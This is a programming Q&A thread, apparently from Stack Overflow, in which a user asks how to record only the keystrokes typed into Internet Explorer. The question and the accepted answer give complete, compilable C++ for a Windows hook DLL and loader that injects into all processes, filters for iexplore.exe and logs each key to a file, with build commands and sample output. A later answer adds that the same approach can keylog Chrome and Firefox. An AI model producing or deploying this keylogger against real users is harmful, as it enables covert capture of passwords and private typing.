# How to capture keystrokes of iexplore.exe only?

Tags: c++, visual-studio, dll

My goal is to capture keystrokes of the user when he is interacting with Internet Explorer (iexplore.exe).

This is my DLL code for a DLL called hook.dll.

```
#include <iostream>
#include <windows.h>

extern "C" __declspec(dllexport)
LRESULT keyboardHook(int nCode, WPARAM wParam, LPARAM lParam)
{
    if (nCode >= 0) {
        std::cout << "nCode: " << nCode << "; wParam: " << wParam
                  <<" (" << char(wParam) << "); scan code: "
                  << ((lParam & 0xFF0000) >> 16)
                  << "; transition state: " << ((lParam & 0x80000000) >> 31)
                  << std::endl;
    }
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    std::cout << "hinstDLL: " << hinstDLL
              << "; fdwReason: " << fdwReason
              << "; lpvReserved: " << lpvReserved << std::endl;

    return TRUE;
}
```

Here is the main program code for main.exe:

```
#include <iostream>
#include <windows.h>

int main(int argc, char **argv)
{
    HMODULE dll = LoadLibrary("hook.dll");
    if (dll == NULL) {
        std::cerr << "LoadLibrary error " << GetLastError() << std::endl;
        return 1;
    }

    HOOKPROC callback = (HOOKPROC) GetProcAddress(dll, "keyboardHook");
    if (callback == NULL) {
        std::cerr << "GetProcAddress error " << GetLastError() << std::endl;
        return 1;
    }

    HHOOK hook = SetWindowsHookEx(WH_KEYBOARD, callback, dll, NULL);
    if (hook == NULL) {
        std::cerr << "SetWindowsHookEx error " << GetLastError() << std::endl;
        return 1;
    }

    MSG messages;
    while (GetMessage (&messages, NULL, 0, 0))
    {
        TranslateMessage(&messages);
        DispatchMessage(&messages);
    }
    UnhookWindowsHookEx(hook);
}
```

I compile this project with these commands:

```
vcvars32.bat
cl /LD hook.cc /link user32.lib
cl main.cc /link user32.lib
```

When I execute the program, and press the keys <kbd>A</kbd>, <kbd>B</kbd> and <kbd>C</kbd>, I see the following output.

```
C:\>main
hinstDLL: 10000000; fdwReason: 1; lpvReserved: 00000000
nCode: 0; wParam: 65 (A); scan code: 30; transition state: 0
nCode: 0; wParam: 65 (A); scan code: 30; transition state: 1
nCode: 0; wParam: 66 (B); scan code: 48; transition state: 0
nCode: 0; wParam: 66 (B); scan code: 48; transition state: 1
nCode: 0; wParam: 67 (C); scan code: 46; transition state: 0
nCode: 0; wParam: 67 (C); scan code: 46; transition state: 1
```

This is all good so far, but this program captures keystrokes made anywhere on the desktop. But I want to capture only those keystrokes that are  made on Internet Explorer. I believe I need to modify the `SetWindowsHookEx(WH_KEYBOARD, callback, dll, NULL);` call in main program and pass the thread ID of the Internet Explorer as the fourth argument to this call. Could you please help me to solve this problem?

Comment: It could have multiple thread IDs.

Comment: It appears the link below has the answer.

http://stackoverflow.com/questions/5922248/c-hooking-to-a-different-application-how-to-find-thread-id-from-process-id

Answer (score 0, accepted):

Here is a solution code based on manuell's suggestion of using `WH_GETMESSAGE`.

DLL code in hook.cc:

```
#include <iostream>
#include <fstream>
#include <windows.h>
#include <psapi.h>

extern "C" __declspec(dllexport)
LRESULT myHook(int nCode, WPARAM wParam, LPARAM lParam)
{
    if (nCode == HC_ACTION) {
        std::ofstream outputTxt("C:\\out.txt",
                                std::ofstream::out | std::ofstream::app);
        PMSG msg = (PMSG) lParam;

        // Get PID of process
        DWORD pid;
        GetWindowThreadProcessId(msg->hwnd, &pid);

        // Get process name
        char filename[1024];
        HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                               FALSE, pid);
        GetModuleBaseName(h, NULL, filename, sizeof filename);

        // Log details only if it is Internet Explorer
        if (msg->message == WM_KEYUP && strcmp(filename, "iexplore.exe") == 0) {
            outputTxt << "nCode: " << nCode << "; wParam: " << wParam 
                      << "; message: " << msg->message
                      << "; keycode: " << msg->wParam << " '"
                      << char(msg->wParam) << "'"
                      << "; filename: " << filename << std::endl;
        }
    }
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    std::cout << "hinstDLL: " << hinstDLL
              << "; fdwReason: " << fdwReason
              << "; lpvReserved: " << lpvReserved << std::endl;

    return TRUE;
}
```

Main program code in main.cc:

```
#include <iostream>
#include <windows.h>

int main(int argc, char **argv)
{
    HMODULE dll = LoadLibrary("hook.dll");
    if (dll == NULL) {
        std::cerr << "LoadLibrary error " << GetLastError() << std::endl;
        return 1;
    }

    HOOKPROC callback = (HOOKPROC) GetProcAddress(dll, "myHook");
    if (callback == NULL) {
        std::cerr << "GetProcAddress error " << GetLastError() << std::endl;
        return 1;
    }

    HHOOK hook = SetWindowsHookEx(WH_GETMESSAGE, callback, dll, NULL);
    if (hook == NULL) {
        std::cerr << "SetWindowsHookEx error " << GetLastError() << std::endl;
        return 1;
    }

    MSG messages;
    while (GetMessage(&messages, NULL, 0, 0))
    {
        TranslateMessage(&messages);
        DispatchMessage(&messages);
    }
    UnhookWindowsHookEx(hook);
}
```

Compiled this project as follows.

```
vcvars32.bat
cl /D_WIN32_WINNT=0x0401 /LD hook.cc /link user32.lib /link psapi.lib
cl main.cc /link user32.lib
```

Since my EXE was 32-bit, I launched 32-bit Internet Explorer, clicked on the address bar and pressed the keys <kbd>A</kbd>, <kbd>B</kbd> and <kbd>C</kbd>. This is the result I found in C:\out.txt.

```
nCode: 0; wParam: 1; message: 257; keycode: 65 'A'; filename: iexplore.exe
nCode: 0; wParam: 1; message: 257; keycode: 66 'B'; filename: iexplore.exe
nCode: 0; wParam: 1; message: 257; keycode: 67 'C'; filename: iexplore.exe
```

Launching 64-bit Internet Explorer, and doing the same thing yielded no results in C:\out.txt.

Answer (score 0):

You have two solutions:

**1** Use `SetWindowsHookEx` `WH_KEYBOARD` with TIDs. That's not easy, as you'll have to imlement a mechanism for detecting new threads.

**2** Use `SetWindowsHookEx` `WH_GETMESSAGE` for all threads. You'll have to filter for KeyBoard messages and for the process name. That's much simpler (*except* that you'll miss the 64 bits process if your EXE is 32, or the other way arround, unless you build and run two EXEs and two DLLs (32/64). Bonus point: you will be able to easily keylog Chrome and Firefox.